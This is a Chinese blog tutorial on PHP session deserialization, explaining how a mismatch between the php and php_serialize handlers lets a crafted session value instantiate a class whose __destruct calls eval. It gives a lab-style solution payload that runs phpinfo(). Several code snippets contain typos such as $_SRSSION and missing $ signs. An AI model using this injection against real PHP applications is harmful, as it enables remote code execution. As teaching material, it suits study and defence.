session反序列化

补天阁2024-01-27 9:51

据陈腾师傅所说:

1.漏洞产生原因:写入格式和读取格式不一样。

下面是三种常见的存储格式:

|---------------------------|---------------------------------------------|
| 处理器 | 对应的存储格式 |
| php | 键名+竖线+经过serialize()函数序列化处理的值 |
| php_serialize(php>=5.54) | 经过serlalize()函数序列化处理的数组 |
| php_binary | 键名的长度对应的ASCII字符+键名+经过 serialize()函数反序列化处理的值 |

复制代码 
(1)php存储
<?php
session_start();
$_SRSSION['benben']=$_GET['ben'];
?>
提交:?ben=dazhuang

结果:benben|s:8:"daxhuang";

键名+竖线+经过serialize()函数序列化处理的值

**(2)**php_serialize(php>=5.54)存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:a:2:{s:6:"benben";s:8:"dazhuang";s:1:"b";s:3:"666";}

经过serlalize()函数序列化处理的数组

(3)php_binary存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_binary');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:ACKbenbens:8:"dazhuang";SOHbs:3:"666";

键名的长度对应的ASCII字符+键名+经过serialize()函数反序列化处理的值

来到题目实战练习:

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php');

session_start();

class D{

var $a;

function __destruct(){

eval($this->a);

}

}

?>

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['ben'\] = _GET['a'];

?>

这里有两个网页分别对应的两段代码,我们只能在页面2上提交,还是老样子,反序列化的很多漏洞开头都是一样的,都要先进行一次正常的反序列化

复制代码 
<?php
class D{
    var $a= "phpinfo();";
}
echo serialize(new D());

O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

到这里,我们得先明白我们要做什么,我们传参a是以php_serialize格式写进去的,但是读取是php读取的,

当我们提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

经过php_serialize保存后,变成了:a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}//全都是经过serlalize()函数序列化处理的数组

**经过PHP读取后,**a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}变成了键名+竖线+经过serialize()函数序列化处理的值,

正好我要的经过serialize()函数序列化处理的值就是O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}这堆可以执行phpinfo的代码,所以漏洞利用成功的。

提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

希望大家能够从文章中收获知识!谢谢!

相关推荐
梁辰兴几秒前
计算机网络基础:TCP 的拥塞控制
tcp/ip·计算机网络·php·tcp·拥塞控制·计算机网络基础·梁辰兴
lingggggaaaa2 小时前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法
贾修行5 小时前
企业级网络安全架构实战:从防火墙部署到远程办公全解析
web安全·架构·智能路由器
Vect__7 小时前
TCP Socket编程详解
网络协议·tcp/ip·php
REDcker7 小时前
TCP 拥塞控制算法详解:CUBIC、BBR 及传统算法
tcp/ip·算法·php
模型时代7 小时前
Infosecurity Europe欧洲信息安全展将推出网络安全初创企业专区
安全·web安全·区块链
niaiheni9 小时前
Log4j 漏洞深度分析:CVE-2021-44228 原理与本质
web安全·网络安全·log4j
小学导航员9 小时前
VMWARE虚拟机上不了网络
服务器·网络·php
Hubianji_099 小时前
[IOS]2026年网络安全、通信技术与计算机科学国际会议(ACCTCS 2026)
计算机网络·安全·web安全·ios·国际会议·国际期刊
上海合宙LuatOS10 小时前
LuatOS ——fota 升级教程
开发语言·人工智能·单片机·嵌入式硬件·物联网·php·硬件工程
热门推荐
01GitHub 镜像站点02一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示03Vue-skills的中文文档04Claude Code Skills 实用使用手册05让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南06UV安装并设置国内源07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书09在Trae中使用Pencil MCP10OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)